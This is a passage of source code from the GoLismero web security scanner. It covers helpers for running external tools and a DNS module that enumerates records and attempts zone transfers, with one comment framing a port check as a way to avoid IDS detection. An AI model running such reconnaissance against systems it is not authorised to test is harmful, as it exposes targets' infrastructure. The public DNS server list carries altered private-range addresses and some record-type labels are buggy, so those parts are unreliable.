".sh": ["sh", "-c"],
".tcl": ["tcl"],
".py": ["python"],
".pyc": ["python"],
".pyo": ["python"],
".pyw": ["python"],
".js": ["WScript.exe"],
".jse": ["WScript.exe"],
".pls": ["WScript.exe"],
".phps": ["WScript.exe"],
".pys": ["WScript.exe"],
".rbs": ["WScript.exe"],
".tcls": ["WScript.exe"],
".vbs": ["WScript.exe"],
".vbe": ["WScript.exe"],
".wsf": ["WScript.exe"],
}
#------------------------------------------------------------------------------
def get_interpreter(script):
"""
Get the correct interpreter for the given script.
:param script: Path to the script file.
:type script: str
:returns: Command line arguments to replace the script with.
Normally this will be the path to the interpreter followed
by the path to the script, but not always.
:rtype: list(str)
:raises IOError: An error occurred, the file was not a script, or the
interpreter was not found.
"""
# Get the file extension.
ext = os.path.splitext(script)[1].lower()
# On Windows...
if os.path.sep == "\\":
# EXE files are executable.
if ext == ".exe":
binary_list = find_binary_in_path(script)
if binary_list:
cygwin = get_cygwin_binary(binary_list)
if cygwin:
return [ cygwin ]
return [ binary_list[0] ]
return [ script ]
# Batch files use cmd.exe.
if ext in (".bat", ".cmd"):
return [ os.environ["COMSPEC"], "/C", script ]
# On Unix, the script may be marked as executable.
elif is_executable(script):
return [ script ]
# Get the name of the default interpreter for each extension.
interpreter = DEFAULT_INTERPRETER.get(ext, None)
if interpreter:
interpreter = list(interpreter) # must be a copy!
# Add the .exe extension on Windows.
if os.path.sep == "\\" and not interpreter[0].endswith(".exe"):
interpreter[0] += ".exe"
# Look for the interpreter binary on the PATH.
binary_list = find_binary_in_path(interpreter[0])
if binary_list:
cygwin = get_cygwin_binary(binary_list)
if cygwin:
interpreter[0] = cygwin
else:
interpreter[0] = binary_list[0]
# Add the script and return it.
interpreter.append(script)
return interpreter
# Try getting the interpreter from the first line of code.
# This works for scripts that follow the shebang convention.
# See: https://en.wikipedia.org/wiki/Shebang_(Unix)
with open(script, "rb") as f:
signature = f.read(128)
signature = signature.strip()
if signature and signature[:1] == "#!":
signature = signature[1:].split("\n", 1)[0]
signature = signature.strip()
args = shlex.split(signature)
if args:
# If it exists and is executable, use it.
if is_executable(args[0]):
args.append(script)
return args
# Try to guess which interpreter it is.
for ext, interpreter in DEFAULT_INTERPRETER.iteritems():
regex = interpreter[0]
regex = "".join((c if c.isalnum() else "\\"+c) for c in regex)
regex = "\\b%s\\b" % regex
if re.search(regex, args[0]):
return interpreter + [script] # must be a copy!
# Broader search, matches stuff like python2, ruby1.9, etc.
for ext, interpreter in DEFAULT_INTERPRETER.iteritems():
regex = interpreter[0]
if regex.isalpha():
regex = "\\b%s[0-9\\.]*\\b" % regex
if re.search(regex, args[0]):
return interpreter + [script] # must be a copy!
# No valid interpreter was found.
raise IOError("Interpreter not found for script: %s" % script)
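# Illustrative examples (editorial note, not in the original source) of what
# get_interpreter() is expected to return on a typical Linux install, assuming
# the named interpreters are on the PATH and "scan.py" / "tool.sh" are
# hypothetical script names:
#   get_interpreter("scan.py")  -> ["/usr/bin/python", "scan.py"]
#   get_interpreter("tool.sh")  -> ["/bin/sh", "-c", "tool.sh"]
# Scripts with unknown extensions are resolved through their "#!" shebang line.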
#------------------------------------------------------------------------------
def find_binary_in_path(binary):
"""
Find the given binary in the current environment PATH.
:note:
The location of the bundled tools is always prepended to the PATH,
independently of the actual value of the environment variable.
This means bundled tools will always be picked before system tools.
    :param binary: Name or path of the binary to find.
    :type binary: str
:returns: List of full paths to the binary.
If not found, the list will be empty.
:rtype: list(str)
"""
# Get the filename.
binary = os.path.split(binary)[1]
# Get the location of the external tools bundled with GoLismero.
tools_folder = get_tools_folder()
locations = [
os.path.join(tools_folder, x) for x in os.listdir(tools_folder)
]
# Get the possible locations from the PATH environment variable.
locations.extend(
os.path.abspath(x)
for x in os.environ.get("PATH", "").split(os.path.pathsep)
)
# Filter out bad entries.
locations = [ x for x in locations if os.path.isdir(x) ]
# On Windows...
if sys.platform in ("win32", "cygwin"):
# Append the system folders.
comspec = os.environ.get("ComSpec", "C:\\Windows\\System32\\cmd.exe")
comspec = os.path.split(comspec)[0]
system_root = os.environ.get("SystemRoot", "C:\\Windows")
system_32 = os.path.join(system_root, "System32")
system_64 = os.path.join(system_root, "SysWOW64")
if comspec not in locations: locations.append(comspec)
if system_root not in locations: locations.append(system_root)
if system_32 not in locations: locations.append(system_32)
if system_64 not in locations: locations.append(system_64)
# Look for the file in the PATH.
found = []
for candidate in locations:
if candidate:
candidate = os.path.join(candidate, binary)
if os.path.exists(candidate):
found.append(candidate)
# On Windows...
if sys.platform in ("win32", "cygwin"):
# Append the ".exe" extension to the binary if missing.
if os.path.splitext(binary)[1] == "":
binary += ".exe"
# Try again.
for candidate in locations:
if candidate:
candidate = os.path.join(candidate, binary)
if os.path.exists(candidate):
found.append(candidate)
# Remove duplicates caused by case differences.
upper = [x.upper() for x in found]
found = [x for i, x in enumerate(found) if x.upper() not in upper[:i]]
# On *nix...
else:
# Remove the extension to the binary if present.
if os.path.splitext(binary)[1] != "":
binary = os.path.splitext(binary)[0]
# Try again.
for candidate in locations:
if candidate:
candidate = os.path.join(candidate, binary)
if os.path.exists(candidate):
found.append(candidate)
# Return all instances found.
return found
#------------------------------------------------------------------------------
def is_cygwin_binary(path):
"""
Detects if the given binary is located in the Cygwin /bin directory.
:param path: Windows path to the binary.
:type path: str
:returns: True if the binary belongs to Cygwin, False for native binaries.
:rtype: bool
"""
path = os.path.abspath(path)
if not os.path.isdir(path):
path = os.path.split(path)[0]
path = os.path.join(path, "cygwin1.dll")
return os.path.exists(path)
#------------------------------------------------------------------------------
def get_cygwin_binary(binary_list):
"""
Take the list of binaries returned by find_binary_in_path() and grab the
one that belongs to Cygwin.
    This is useful for commands or scripts that work differently or better on
    Cygwin than the native version (for example the "find" command).
:param binary_list: List of paths to the binaries to test.
    :type binary_list: list(str)
:returns: Path to the Cygwin binary, or None if not found.
:type: str | None
"""
for binary in binary_list:
if is_cygwin_binary(binary):
return binary
#------------------------------------------------------------------------------
def find_cygwin_binary_in_path(binary):
"""
Find the given binary in the current environment PATH,
but only if it's the Cygwin version.
    This is useful for commands or scripts that work differently or better on
    Cygwin than the native version (for example the "find" command).
    :param binary: Name or path of the binary to find.
    :type binary: str
:returns: Path to the Cygwin binary, or None if not found.
:type: str | None
"""
return get_cygwin_binary( find_binary_in_path(binary) )
#------------------------------------------------------------------------------
def win_to_cygwin_path(path):
"""
Converts a Windows path to a Cygwin path.
:param path: Windows path to convert.
Must be an absolute path.
:type path: str
:returns: Cygwin path.
:rtype: str
:raises ValueError: Cannot convert the path.
"""
drive, path = ntpath.splitdrive(path)
if not drive:
raise ValueError("Not an absolute path!")
t = { "\\": "/", "/": "\\/" }
path = "".join( t.get(c, c) for c in path )
return "/cygdrive/%s%s" % (drive[0].lower(), path)
#------------------------------------------------------------------------------
def cygwin_to_win_path(path):
"""
Converts a Cygwin path to a Windows path.
Only paths starting with "/cygdrive/" can be converted.
:param path: Cygwin path to convert.
Must be an absolute path.
:type path: str
:returns: Windows path.
:rtype: str
:raises ValueError: Cannot convert the path.
"""
if not path.startswith("/cygdrive/"):
raise ValueError(
"Only paths starting with \"/cygdrive/\" can be converted.")
drive = path[10].upper()
path = path[11:]
i = 0
r = []
while i < len(path):
c = path[i]
if c == "\\":
r.append( path[i+1:i+2] )
i += 2
continue
if c == "/":
c = "\\"
r.append(c)
i += 1
path = "".join(r)
return "%s:%s" % (drive, path)
#------------------------------------------------------------------------------
@contextlib.contextmanager
def tempfile(*args, **kwargs):
"""
Context manager that creates a temporary file.
The file is deleted when leaving the context.
Example:
>>> with tempfile(prefix="tmp", suffix=".bat") as filename:
... with open(filename, "w") as fd:
... fd.write("@echo off\\necho Hello World!\\n")
... print run_external_tool("cmd.exe", ["/C", filename])
...
('Hello World!', 0)
The arguments are exactly the same used by the standard NamedTemporaryFile
class (from the tempfile module).
"""
# On Windows we can't open a temporary file twice (although it's
# actually Python who won't let us). Note that there is no exploitable
# race condition here, because on Windows you can only create
# filesystem links from an Administrator account.
if sys.platform in ("win32", "cygwin"):
kwargs["delete"] = False
output_file = NamedTemporaryFile(*args, **kwargs)
output = output_file.name
output_file.close()
yield output
os.unlink(output_file.name)
# On POSIX we can do things more elegantly.
# It also prevents a race condition vulnerability, although if you're
# running a Python script from root you kinda deserve to get pwned.
else:
with NamedTemporaryFile(suffix = ".xml") as output_file:
yield output_file.name
#------------------------------------------------------------------------------
@contextlib.contextmanager
def tempdir():
"""
Context manager that creates a temporary directory.
The directory is deleted when leaving the context.
Example:
>>> with tempdir() as directory:
... print run_external_tool("cmd.exe", ["dir", directory])
...
"""
output_dir = mkdtemp()
yield output_dir
if os.path.isdir(output_dir):
try:
rmtree(output_dir)
except Exception:
pass
```
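A short usage sketch for the helpers above. The import path `golismero.api.external` is assumed from the file location, the `run_and_collect` wrapper is hypothetical, and the calls require a POSIX system with a `python` binary on the PATH.
```python
# Editorial usage sketch of run_external_tool(), tempfile() and
# get_interpreter() as defined above; not part of the original module.
from golismero.api.external import run_external_tool, tempfile, get_interpreter


def run_and_collect(command, args=None):
    """Run a tool and collect its combined stdout/stderr lines."""
    lines = []
    exit_code = run_external_tool(command, args, callback=lines.append)
    return exit_code, lines


if __name__ == "__main__":
    # Run a simple command and capture its output line by line.
    print run_and_collect("uname")
    # Write a tiny script into a temporary file and see which interpreter
    # would be used to run it.
    with tempfile(suffix=".py") as filename:
        with open(filename, "w") as fd:
            fd.write("print 'hello from a temp script'\n")
        print get_interpreter(filename)
```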
#### File: api/net/dns.py
```python
from __future__ import absolute_import
__license__ = """
GoLismero 2.0 - The web knife - Copyright (C) 2011-2014
Golismero project site: http://golismero-project.com
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = ["DNS"]
from ..data.information.dns import * # noqa
from ..data import LocalDataCache
from ...common import Singleton
import dns.query
import dns.resolver
import dns.reversename
import socket
from dns.zone import *
from netaddr import IPAddress
from netaddr.core import AddrFormatError
#------------------------------------------------------------------------------
class _DNS(Singleton):
# Some code borrowed from the dnsrecon project:
# https://github.com/darkoperator/dnsrecon
REQUEST_TIMEOUT = 2.0 # In seconds
# Public list of free DNS servers.
#
# This list was taken from:
#
# http://pcsupport.about.com/od/tipstricks/a/free-public-dns-servers.htm
#
PUBLIC_NAMESERVERS = [
# Level 3 (http://www.level3.com/)
"192.168.3.11",
"172.16.17.32",
# Google
"8.8.8.8",
"8.8.4.4",
# Security (http://www.securly.com/)
"172.16.58.3",
"172.16.17.32",
# Comodo Secure DNS (http://www.comodo.com/secure-dns/)
"8.26.56.26",
"8.20.247.20",
# OpenDNS Home (http://www.opendns.com/)
"208.67.222.222",
"208.67.220.220",
# DNS Advantage (http://www.neustar.biz/enterprise/dns-services/free-recursive-dns)
"172.16.17.32",
"172.16.31.10",
# Norton ConnectSafe (https://dns.norton.com/dnsweb/faq.do)
"172.16.58.3",
"192.168.127.12",
# SafeDNS (https://www.safedns.com/features/)
"192.168.127.12",
"192.168.3.11",
# OpenNIC (http://www.opennicproject.org/)
"192.168.127.12",
"172.16.31.10",
# Public -Root (http://public-root.com/root-server-check/index.htm)
"192.168.3.11",
"172.16.58.3",
# SmartViper (http://www.markosweb.com/free-dns/)
"192.168.127.12",
"172.16.17.32",
# Dyn (http://dyn.com/support/internet-guide-setup/)
"192.168.3.11",
"172.16.17.32",
# Hurricane Electric (http://he.net/)
"192.168.127.12",
# puntCAT (http://www.servidordenoms.cat/)
"172.16.58.3",
]
#--------------------------------------------------------------------------
def check_tcp_dns(self, address, dns_port=53):
"""
        Function to check if a server is listening on TCP port 53. This
        helps avoid IDS/IPS detection, since an AXFR will not be attempted if
        TCP port 53 is found to be closed.
:param address: IP address or domain name.
:type address: str
:param dns_port: Port number to connect to the server.
:type dns_port: int
:return: True if server accepts TCP connections, False otherwise.
:rtype: bool
"""
if not isinstance(address, basestring):
raise TypeError("Expected basestring, got '%s'" % type(address))
if not isinstance(dns_port, int):
raise TypeError("Expected int, got '%s'" % type(dns_port))
if dns_port < 1:
raise ValueError("Port number must be greater than 0.")
s = socket.socket()
s.settimeout(self.REQUEST_TIMEOUT)
try:
s.connect((address, dns_port))
except Exception:
return False
else:
return True
finally:
s.close()
#--------------------------------------------------------------------------
def resolve(self, target, type, nameservers=None):
"""
        Perform a DNS resolution of the given type.
        The special register type "ALL" returns every register
        returned by the query.
:param target: Name to resolve.
:type target: str
:param type: Type of query: ALL, A, AAAA, NS, PTR...
:type type: int | str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: DNS registers.
:rtype: list(DnsRegister)
"""
return self._make_request(type, target, nameservers)
#--------------------------------------------------------------------------
def get_a(self, host, nameservers=None, also_CNAME=False):
"""
Resolve the A records for a given host.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
        :param also_CNAME: Set this to True to also return the CNAME registers returned by the query.
        :type also_CNAME: bool
:return: Type A registers.
:rtype: list(DnsRegisterA)
"""
# Special case for localhost
if host.lower() == "localhost":
return [DnsRegisterA("127.0.0.1")]
r = self._make_request("A", host, nameservers, auto_resolve=not also_CNAME)
        # Get all the registers: CNAME and A
if also_CNAME:
m_return = []
if not isinstance(r, list):
m_return.extend(self._dnslib2register("ALL", r))
else:
m_return_extend = m_return.extend
for lr in r:
m_return_extend(self._dnslib2register("ALL", lr))
return m_return
else:
return r
#--------------------------------------------------------------------------
def get_aaaa(self, host, nameservers=None, also_CNAME=False):
"""
        Resolve the AAAA records for a given host.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
        :param also_CNAME: Set this to True to also return the CNAME registers returned by the query.
        :type also_CNAME: bool
:return: AAAA registers.
:rtype: list(DnsRegisterAAAA)
"""
# Special case for localhost
if host.lower() == "localhost":
return [DnsRegisterAAAA("::1")]
r = self._make_request("AAAA", host, nameservers, auto_resolve=not also_CNAME)
if also_CNAME:
            # Get all the registers: CNAME and A
m_return = []
if not isinstance(r, list):
m_return.extend(self._dnslib2register("ALL", r))
else:
m_return_extend = m_return.extend
for lr in r:
m_return_extend(self._dnslib2register("ALL", lr))
return m_return
else:
return r
#--------------------------------------------------------------------------
def get_mx(self, host, nameservers=None):
"""
Resolve the MX records for a given host.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: MX registers.
:rtype: list(DnsRegisterMX)
"""
return self._make_request("MX", host, nameservers)
#--------------------------------------------------------------------------
def get_ns(self, host, nameservers=None):
"""
Returns all NS records. Also returns the IP
address of the host both in IPv4 and IPv6.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: NS registers.
:rtype: list(DnsRegisterNS)
"""
return self._make_request("NS", host, nameservers)
#--------------------------------------------------------------------------
def get_soa(self, host, nameservers=None):
"""
Returns all SOA records. Also returns the IP
address of the host both in IPv4 and IPv6.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: SOA registers.
:rtype: list(DnsRegisterSOA)
"""
return self._make_request("SOA", host, nameservers)
#--------------------------------------------------------------------------
def get_spf(self, host, nameservers=None):
"""
Resolve SPF records.
        :param host: Target hostname.
        :type host: str
        :param nameservers: Nameservers to use.
        :type nameservers: list(str)
:return: SPF registers.
:rtype: list(DnsRegisterSPF)
"""
return self._make_request("SPF", host, nameservers)
#--------------------------------------------------------------------------
def get_txt(self, host, nameservers=None):
"""
Resolve TXT records.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: TXT registers.
:rtype: list(DnsRegisterTXT)
"""
return self._make_request("TXT", host, nameservers)
#--------------------------------------------------------------------------
def get_ptr(self, ipaddress, nameservers=None):
"""
        Resolve the PTR records for a given IPv4 or IPv6 address.
:param ipaddress: Target IP address.
:type ipaddress: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: PTR registers.
:rtype: list(DnsRegisterPTR)
"""
if not isinstance(ipaddress, basestring):
raise TypeError("Expected basestring, got '%s'" % type(ipaddress))
# Detect the IP address version
m_ipobj = None
try:
m_ipobj = IPAddress(ipaddress)
except AddrFormatError:
raise ValueError("Wrong IP address")
# Make the query
m_ip = str(dns.reversename.from_address(ipaddress))
# Get the IPs
if m_ip:
            if m_ipobj.version == 4:  # IPAddress.version is an int, not a string
m_name = m_ip.replace(".in-addr.arpa.", "")
else:
m_name = m_ip.replace("ip6.arpa.", "")
return self._make_request("PTR", m_name, nameservers)
else:
return []
#--------------------------------------------------------------------------
def get_srv(self, host, nameservers=None):
"""
Function for resolving SRV Records.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: SRV registers.
:rtype: list(DnsRegisterSRV)
"""
return self._make_request("SRV", host, nameservers)
#--------------------------------------------------------------------------
def get_nsec(self, host, nameservers=None):
"""
        Function for querying an NSEC record and retrieving the rdata object.
This function is used mostly for performing a Zone Walk against a zone.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: NSEC registers.
:rtype: list(DnsRegisterNSEC)
"""
return self._make_request("NSEC", host, nameservers)
#--------------------------------------------------------------------------
def zone_transfer(self, domain, nameservers = None, ns_allowed_zone_transfer=False):
"""
Function for testing for zone transfers on a given Domain.
:param domain: Target hostname.
:type domain: str
:param nameservers: Alternate nameservers.
:type nameservers: list(str)
        :param ns_allowed_zone_transfer: if set to True, this function will return the list of
nameservers with zone transfer enabled.
:type ns_allowed_zone_transfer: bool
:return: If successful, a list of DnsRegister objects.
Otherwise, an empty list. If ns_allowed_zone_transfer is enabled, it will
            return a tuple of the form: (set(servers with zone transfer enabled), list(DnsRegister))
:rtype: list(DnsRegister) | (set(str), list(DnsRegister))
"""
if not isinstance(domain, basestring):
raise TypeError("Expected basestring, got '%s'" % type(domain))
if nameservers:
if isinstance(nameservers, list):
for n in nameservers:
if not isinstance(n, basestring):
raise TypeError("Expected basestring, got '%s'" % type(n))
else:
raise TypeError("Expected list, got '%s'" % type(nameservers))
# Results of zone transfer
zone_records = []
zone_records_append = zone_records.append
ns_zone_enabled = set()
        # Available DNS servers
ns_records = None
# If nameservers specified -> use it
if nameservers:
ns_records = set(nameservers)
else: # Looking for nameservers for the domain
#Find NS for domains
ns_tmp = self.get_ns(domain)
#
# Check the input domain
#
# If name server of the domain is NOT empty -> the domain is NOT a nameserver
if ns_tmp:
# Mark for not tracking
map(LocalDataCache.on_autogeneration, ns_tmp)
# Store only the IP address of the DNS servers
l_dns = set()
l_dns_append = l_dns.add
for d in ns_tmp:
for t in self.get_ips(d):
l_dns_append(t.address)
# Mark for not tracking
LocalDataCache.on_autogeneration(t)
# Find SOA for Domain
for d in self.get_soa(domain):
for t in self.get_ips(d):
l_dns_append(t.address)
# Mark for not tracking
LocalDataCache.on_autogeneration(t)
# Mark for not tracking
LocalDataCache.on_autogeneration(d)
ns_records = l_dns
else:
                # The domain is a DNS server
ns_records = set((domain,))
#
# Make the transfer for each NS Server
#
for ns_srv in ns_records:
if self.check_tcp_dns(ns_srv):
try:
zone = self._from_wire(dns.query.xfr(where=ns_srv, zone=domain, timeout=10))
# Store the ns used to the zone transfer
if ns_allowed_zone_transfer:
ns_zone_enabled.add(ns_srv)
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SOA):
for rdata in rdataset:
zone_records_append(self._dnslib2register("SOA",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NS):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NS",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.TXT):
for rdata in rdataset:
zone_records_append(self._dnslib2register("TXT",rdata))
                    for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SPF):
                        for rdata in rdataset:  # this inner loop was missing, reusing rdata from the previous block
                            zone_records_append(self._dnslib2register("SPF",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.PTR):
for rdata in rdataset:
zone_records_append(self._dnslib2register("PTR",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.MX):
for rdata in rdataset:
zone_records_append(self._dnslib2register("MX",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.AAAA):
for rdata in rdataset:
zone_records_append(self._dnslib2register("AAAA",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.A):
for rdata in rdataset:
zone_records_append(self._dnslib2register("A",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.CNAME):
for rdata in rdataset:
zone_records_append(self._dnslib2register("CNAME",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SRV):
for rdata in rdataset:
zone_records_append(self._dnslib2register("SRV",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.HINFO):
for rdata in rdataset:
zone_records_append(self._dnslib2register("HINFO",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.WKS):
for rdata in rdataset:
zone_records_append(self._dnslib2register("WKS",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.RP):
for rdata in rdataset:
zone_records_append(self._dnslib2register("RP",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.AFSDB):
for rdata in rdataset:
zone_records_append(self._dnslib2register("AFSDB",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.LOC):
for rdata in rdataset:
zone_records_append(self._dnslib2register("LOC",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.X25):
for rdata in rdataset:
zone_records_append(self._dnslib2register("X25",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.ISDN):
for rdata in rdataset:
zone_records_append(self._dnslib2register("ISDN",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.RT):
for rdata in rdataset:
zone_records_append(self._dnslib2register("X25",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSAP):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSAP",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NAPTR):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NAPTR",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.CERT):
for rdata in rdataset:
zone_records_append(self._dnslib2register("CERT",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SIG):
for rdata in rdataset:
zone_records_append(self._dnslib2register("SIG",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.RRSIG):
for rdata in rdataset:
zone_records_append(self._dnslib2register("RRSIG",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.DNSKEY):
for rdata in rdataset:
zone_records_append(self._dnslib2register("DNSKEY",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.DS):
for rdata in rdataset:
zone_records_append(self._dnslib2register("DS",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSEC):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSEC",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSEC3):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSEC3",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSEC3PARAM):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSEC3PARAM",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.IPSECKEY):
for rdata in rdataset:
zone_records_append(self._dnslib2register("IPSECKEY",rdata))
except:
pass
if ns_allowed_zone_transfer:
return (ns_zone_enabled, zone_records)
else:
return zone_records
#--------------------------------------------------------------------------
#
# Helpers
#
#--------------------------------------------------------------------------
#
    # This method has been taken directly (with some changes) from the dnsrecon project
#
def _from_wire(self, xfr, zone_factory=Zone, relativize=True):
"""
Method for turning returned data from a DNS AXFR to RRSET.
        Unlike the method included with dnspython, this one does not
        perform an origin check on the zone data.
"""
z = None
for r in xfr:
if z is None:
if relativize:
origin = r.origin
else:
origin = r.answer[0].name
rdclass = r.answer[0].rdclass
z = zone_factory(origin, rdclass, relativize=relativize)
for rrset in r.answer:
znode = z.nodes.get(rrset.name)
if not znode:
znode = z.node_factory()
z.nodes[rrset.name] = znode
zrds = znode.find_rdataset(rrset.rdclass, rrset.rdtype,
rrset.covers, True)
zrds.update_ttl(rrset.ttl)
for rd in rrset:
rd.choose_relativity(z.origin, relativize)
zrds.add(rd)
return z
#--------------------------------------------------------------------------
def get_ips(self, register):
"""
        Get the list of IPs associated with the given register.
        If you pass a CNAME register, you get A/AAAA registers back:
>> cname = DnsRegisterCNAME("myalias.mysite.com")
>> a = Dns.get_ips(cname)
>> print a
[<DnsRegisterA object at 0x103ad9a50>]
>> print a[0]
<DnsRegisterA object at 0x103ad9a50>
>> print a[0].target
127.0.0.1
:param register: A DNS Register.
Valid registers are: DnsRegisterA, DnsRegisterAAAA,
DnsRegisterCNAME DnsRegisterISDN, DnsRegisterNS,
DnsRegisterNSAP, DnsRegisterPTR, DnsRegisterSOA,
DnsRegisterSRV, DnsRegisterWKS, DnsRegisterX25
:type register: DnsRegister
:return: A list with the A and AAAA registers.
:rtype : list(DnsRegisterA|DnsRegisterAAAA)
"""
if not isinstance(register, DnsRegister):
raise TypeError("Expected DnsRegister, got '%s'" % type(register))
PROP = self.PROPERTIES_WITH_IP_ADDRESSES
if register.type not in PROP:
return []
if register.type in ("A", "AAAA"):
return [register]
m_return = []
target = getattr(register, PROP[register.type])
# IPv4 address
m_return.extend(self.get_a(target))
# IPv6 address
m_return.extend(self.get_aaaa(target))
return m_return
PROPERTIES_WITH_IP_ADDRESSES = {
"A":"target",
"AAAA":"target",
"CNAME":"target",
"ISDN":"address",
"NS":"target",
"NSAP":"address",
"PTR":"target",
"SOA":"mname",
"SRV":"target",
"WKS":"address",
"X25":"address"
}
#--------------------------------------------------------------------------
def _dnslib2register(self, type, answer_in):
"""
Creates a DnsRegister from a dnslib register.
        The special register type "ALL" converts every register type
        found in the answer.
:param type: Type of response to get: A, AAAA, CNAME...
:type type: str
:param answer_in: Object with the answer from dnslib.
:type answer_in: dns.resolver.Answer
:return: DNS register.
:rtype: list(DnsRegister)
"""
m_return = []
m_return_append = m_return.append
if isinstance(answer_in, dns.resolver.Answer):
for ardata in answer_in.response.answer:
for rdata in ardata:
register_type = DnsRegister.id2name(rdata.rdtype)
                    # If the register is different from the one we are looking for, skip it.
if type != register_type and type != "ALL":
continue
m_return_append(self.__dnsregister2golismeroregister(register_type, rdata))
else:
register_type = DnsRegister.id2name(answer_in.rdtype)
m_return_append(self.__dnsregister2golismeroregister(register_type, answer_in))
return m_return
#--------------------------------------------------------------------------
def __dnsregister2golismeroregister(self, register_type, answer):
"""
Transform a dnslib register into a DnsRegister.
:param register_type: Type of register.
:type register_type: str
:param answer: dnslib object with a DNS register data.
:type answer: object
:return: DNS register.
:rtype: DnsRegister
"""
m_return = None
if register_type == "A":
m_return = DnsRegisterA(answer.address)
elif register_type == "AAAA":
m_return = DnsRegisterAAAA(answer.address)
elif register_type == "AFSDB":
m_return = DnsRegisterAFSDB(answer.subtype, answer.hostname.to_text()[:-1])
elif register_type == "CERT":
m_return = DnsRegisterCERT(answer.algorithm,
answer.certificate,
answer.certificate_type,
answer.key_tag)
elif register_type == "CNAME":
m_return = DnsRegisterCNAME(answer.target.to_text()[:-1])
elif register_type == "DNSKEY":
m_return = DnsRegisterDNSKEY(answer.algorithm,
answer.flags,
dns.rdata._hexify(answer.key),
answer.protocol)
elif register_type == "DS":
m_return = DnsRegisterDS(answer.algorithm,
dns.rdata._hexify(answer.digest),
answer.digest_type,
answer.key_tag)
elif register_type == "HINFO":
m_return = DnsRegisterHINFO(answer.cpu,
answer.os)
elif register_type == "IPSECKEY":
m_return = DnsRegisterIPSECKEY(answer.algorithm,
answer.gateway,
answer.gateway_type,
answer.key,
answer.precedence)
elif register_type == "ISDN":
m_return = DnsRegisterISDN(answer.address,
answer.subaddress)
elif register_type == "LOC":
m_return = DnsRegisterLOC(answer.latitude,
answer.longitude,
answer.altitude,
answer.to_text())
elif register_type == "MX":
m_return = DnsRegisterMX(answer.exchange.to_text()[:-1],
answer.preference)
elif register_type == "NAPTR":
m_return = DnsRegisterNAPTR(answer.order,
answer.preference,
answer.regexp,
answer.replacement.to_text()[:-1],
answer.service)
elif register_type == "NS":
m_return = DnsRegisterNS(answer.target.to_text()[:-1])
elif register_type == "NSAP":
m_return = DnsRegisterNSAP(answer.address)
elif register_type == "NSEC":
m_return = DnsRegisterNSEC(answer.next.to_text()[:-1])
elif register_type == "NSEC3":
m_return = DnsRegisterNSEC3(answer.algorithm,
answer.flags,
answer.iterations,
dns.rdata._hexify(answer.salt))
elif register_type == "NSEC3PARAM":
m_return = DnsRegisterNSEC3PARAM(answer.algorithm,
answer.flags,
answer.iterations,
dns.rdata._hexify(answer.salt))
elif register_type == "PTR":
m_return = DnsRegisterPTR(answer.target.to_text()[:-1])
elif register_type == "RP":
m_return = DnsRegisterRP(answer.mbox.to_text()[:-1],
answer.txt.to_text()[:-1])
elif register_type == "RPSIG":
m_return = DnsRegisterRRSIG(answer.algorithm,
answer.expiration,
answer.interception,
answer.key_tag,
answer.labels,
answer.original_ttl,
answer.signer,
